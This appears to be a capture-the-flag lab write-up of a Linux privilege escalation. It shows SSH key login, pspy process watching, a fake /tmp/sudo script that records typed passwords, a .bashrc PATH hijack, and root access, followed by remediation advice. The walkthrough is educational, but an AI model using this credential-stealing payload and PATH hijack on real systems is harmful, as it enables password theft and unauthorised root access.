Case file

SSH key foothold, pspy sudo watch, and PATH password theft

Foundations Linux engagement: provided frank SSH key; pspy showed root running bare sudo; PATH hijack of sudo captured frank’s password for root.

Foundations22 minLinux · PATH Hijacking · Credential Theft · Privilege Escalation
01

Engagement summary

Frank’s private key opened SSH. Login-triggered sudo cat /etc/shadow without an absolute path; a fake /tmp/sudo on PATH logged the password for root su.

EAVESDROPPER supplied an SSH private key for frank. After login, pspy64 showed UID 0 periodically executing sudo cat /etc/shadow — relative sudo, not /usr/bin/sudo. Planting /tmp/sudo that read a password prompt into /home/frank/pass.txt and prepending PATH=/tmp in ~/.bashrc caused the next SSH login to capture !@#frankisawesome2022%*. /usr/bin/sudo su with that secret returned root.

Business impact

Scripts that invoke sudo without an absolute path under a user-controlled PATH are credential theft. Use full paths in root automation, clear or reset PATH in privileged contexts, and monitor for unexpected binaries early in PATH.

02

Key login and process watch

pspy revealed root’s relative sudo on SSH login.

OPERATOR · SSH

savvy@lab:~$ chmod 600 id_rsa && ssh frank@10.10.10.50 -i id_rsa

savvy@lab:~$

savvy@lab:~$ scp -i id_rsa pspy64 frank@10.10.10.50:.

savvy@lab:~$ chmod +x pspy64 && ./pspy64

CMD: UID=0 PID=662 | sudo cat /etc/shadow

03

PATH sudo hijack to root

Fake sudo captured the password; absolute sudo su completed root.

PAYLOAD

/tmp/sudo

#!/bin/bash
read -p "Password: " password
echo "$password" > /home/frank/pass.txt

OPERATOR · ROOT

savvy@lab:~$ chmod +x /tmp/sudo

savvy@lab:~$ sed -i '4iPATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin' ~/.bashrc && exit

savvy@lab:~$ ssh frank@10.10.10.50 -i id_rsa

savvy@lab:~$ cat /home/frank/pass.txt

!@#frankisawesome2022%*

savvy@lab:~$ /usr/bin/sudo su

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Rewrite login hooks to call /usr/bin/sudo with a secure_path. Restrict write to directories early in PATH. Prefer key-only root escalation without password prompts in automation.